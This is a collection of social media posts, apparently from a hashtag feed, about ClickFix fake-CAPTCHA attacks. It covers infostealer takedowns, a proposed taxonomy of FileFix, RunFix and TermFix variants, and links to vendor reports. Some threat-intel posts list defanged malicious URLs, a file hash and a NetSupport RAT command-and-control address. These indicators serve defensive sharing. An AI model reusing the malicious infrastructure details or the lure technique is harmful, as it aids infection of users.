Lmst

In May 2025, #ESET participated in operations that largely disrupted the infrastructure of two notorious infostealers: #LummaStealer and #Danabot.
As part of the Lumma Stealer disruption effort, carried out in conjunction with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry, ESET supplied technical analysis and statistical information.
Danabot was targeted by the #FBI and #DCIS, alongside #OperationEndgame led by #Europol and #Eurojust. ESET participated together with several other companies. We provided the analysis of the malware’s backend infrastructure and identified its C&C servers.
Before these takedowns, both infostealers were on the rise: in H1 2025, Lumma Stealer detections grew by 21%, while Danabot’s numbers increased by more than 50%.
For a time, Lumma Stealer was the primary payload of HTML/FakeCaptcha trojan, used in the #ClickFix social engineering attacks that we also cover in this issue of the #ESETThreatReport. In recent months, we have seen Danabot being delivered via ClickFix as well.
For more details on these two operations and on the ClickFix attacks, read the latest #ESETThreatReport: https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025

🚨 ClickFix = CAPTCHA + Malware

Rhadamanthys infostealer is back, this time hiding behind fake “verify” prompts that run PowerShell.

No macros. No attachments.
👀 SMEs are targets.
#CyberSecurity #ClickFix #Rhadamanthys #PaxionCyber #SMBSecurity #CyberAwareness

@badsamurai That's basically my point. #FileFix is just #ClickFix by another name. Trying to separate the two doesn't make sense to me.

Definitely agree that your mitigation is a good way to help combat this.

#Example 3: #TermFix

I rarely see this, and I haven't yet personally documented it. So I found an image from a Google search to illustrate.

This example is from a #TermFix style #ClickFix popup asking the viewer to open a PowerShell terminal.

Example 2: #FileFix

As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

A "FileFix" style ClickFix page from the KongTuke campaign.

Example 1: #RunFix

As of 2025-07-03, the #SmartApeSG campaign is using RunFix style #ClickFix pages to distribute #NetSupportRAT

Screenshot of a "RunFix" style ClickFix page from the SmartAgeSG campaign.

Details of network traffic from a NetSupport RAT infection via "RunFix" style ClickFix.

#ClickFix is a social engineering technique that uses fake verification pages and clipboard hijacking to convince people to click and keyboard stroke their way to an infection. So let's categorize #FileFix properly in the pantheon of ClickFix Attacks.

FileFix: A ClickFix page that asks you to past script into a File Manager window.

#RunFix: A ClickFix page that asks you to paste script into a Run window

#TermFix: A ClickFix page that asks you to paste script into a terminal window (cmd.exe console or PowerShell terminal).

We cool with that? Any others types I'm missing?

How this ClickFix campaign leads to Redline Stealer
#ClickFix #RedLineStealer
https://sec.okta.com/articles/2025/07/how-this-clickfix-campaign-leads-to-redline-stealer/

Are we still on about the MotW flaws? I'm not sure anyone pays attention to that anyway.

https://www.darkreading.com/endpoint-security/clickfix-spin-off-bypassing-key-browser-safeguards

#clickfix #windows

North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaig
https://thehackernews.com/2025/07/north-korean-hackers-target-web3-with.html

#Infosec #Security #Cybersecurity #CeptBiro #NorthKoreanHackers #Web3 #NimMalware #ClickFix #BabySharkCampaig

"Analysis of the threat case of kimsuky group using 'ClickFix' tactic" published by Genians. #ClickFix, #Kimsuky, #DPRK, #CTI https://www.genians.co.kr/en/blog/threat_intelligence/suky-castle

"'클릭픽스' 전술을 활용한 김수키 그룹 위협 사례 분석" published by Genians. #ClickFix, #Kimsuky, #DPRK, #CTI https://www.genians.co.kr/blog/threat_intelligence/suky-castle

Новости кибербезопасности за неделю с 23 по 29 июня 2025

Всё самое интересное из мира кибербезопасности /** с моими комментариями. На этой неделе новости про то, как Минцифры предлагает запретить смену IMEI, WordPress снова под атакой, американцы запретили себе WhatsApp, clickfix перерождается в filefix, Brother такой Brother и другие только самые важные и интересные новости из мира информационной безопасности.

https://habr.com/ru/articles/922166/

#информационная_безопасность #imei #wordpress #microsoft #санкции #whatsapp #clickfix #mcp #brother #kaspersky

2025-06-27 (Friday): #SmartApeSG infection chain leading to #ClickFix lure leading to #NetSupportRAT

URL sequence leading to ClickFix:

- palcomp3[.]top/sss/buf.js
- palcomp3[.]top/sss/index.php?GQX1KqUM
- palcomp3[.]top/sss/bof.js?19ec2a189848bc0bfa

URL sequence after running ClickFix script:

- camplively[.]com/all.php
- camplively[.]com/smks.zip?lap=3928

SHA256 hash for smks.zip archive containing NetSupport RAT package:

3be246afee53241eaa9c1f74d6720cc5d1004846ded378bd4b1040064b5631c5

NetSupportRAT C2: 185.163.45[.]30:443

cc: @monitorsg

Injected SmartApeSG script in page from legitimate but compromised website. This injected script leads to the ClickFix page.

Example of the ClickFix page and script injected into a victim's clipboard (clipboard hijacking) that the victim is asked to paste into Run window and run.

URL sequence for the ClickFix page and the URLs for NetSupport RAT.

Traffic from the infection filtered in Wireshark, showing the NetSupport RAT C2 traffic.

ESET Threat Report H1 2025: #ClickFix attacks surge 500%, SnakeStealer tops infostealer charts, and NFC fraud jumps 35x. Plus, chaos in the ransomware underworld and a new Android adware menace—Kaleidoscope. Dive into the full report: https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12025.pdf #ESETresearch

New #FileFix attack weaponizes #Windows #FileExplorer for stealthy commands

https://www.bleepingcomputer.com/news/security/filefix-attack-weaponizes-windows-file-explorer-for-stealthy-powershell-commands/

#cybersecurity #ClickFix

🚨 New malware alert: Mocha Manakin uses #Clickfix (fakeCAPTCHA) to trick users into deploying a custom backdoor called NodeInitRAT. Red Canary warns it could lead to ransomware!

🔗 https://hackread.com/mocha-manakin-malware-nodeinitrat-via-clickfix-attack

#CyberSecurity #CyberAttack #fakeCAPTCHA #MochaManakin #NodeInitRAT

2025-06-18 (Wednesday): #SmartApeSG --> #ClickFix lure --> #NetSupportRAT --> #StealCv2

A #pcap of the traffic, the malware/artifacts, and some IOCs are available at https://www.malware-traffic-analysis.net/2025/06/18/index.html.

Today's the 12th anniversary of my first blog post on malware-traffic-analysis.net, so I made this post a bit more old school.

HTML source of page from legitimate but compromised site showing SmartApeSG injected script.

Traffic from an infection filtered in Wireshark. This shows the NetSupport RAT C2 traffic and StealC v2 traffic.

"Famous Chollima deploying Python version of GolangGhost RAT" published by CiscoTalos. #ClickFix, #FamousChollima, #PylangGhost, #DPRK, #CTI https://blog.talosintelligence.com/python-version-of-golangghost-rat/

📢 Campagne de malware utilisant ClickFix pour déployer ARECHCLIENT2
📝 Elastic Security Labs a détecté une augmentation des campagnes utilisant la technique **ClickFix**, une méthode d'ingénierie sociale qui incite les utilisateurs à exécuter du code mal...
📖 cyberveille : https://cyberveille.ch/posts/2025-06-18-campagne-de-malware-utilisant-clickfix-pour-deployer-arechclient2/
🌐 source : https://www.elastic.co/security-labs/a-wretch-client
#ARECHCLIENT2 #ClickFix #Cyberveille

#clickfix

Client Info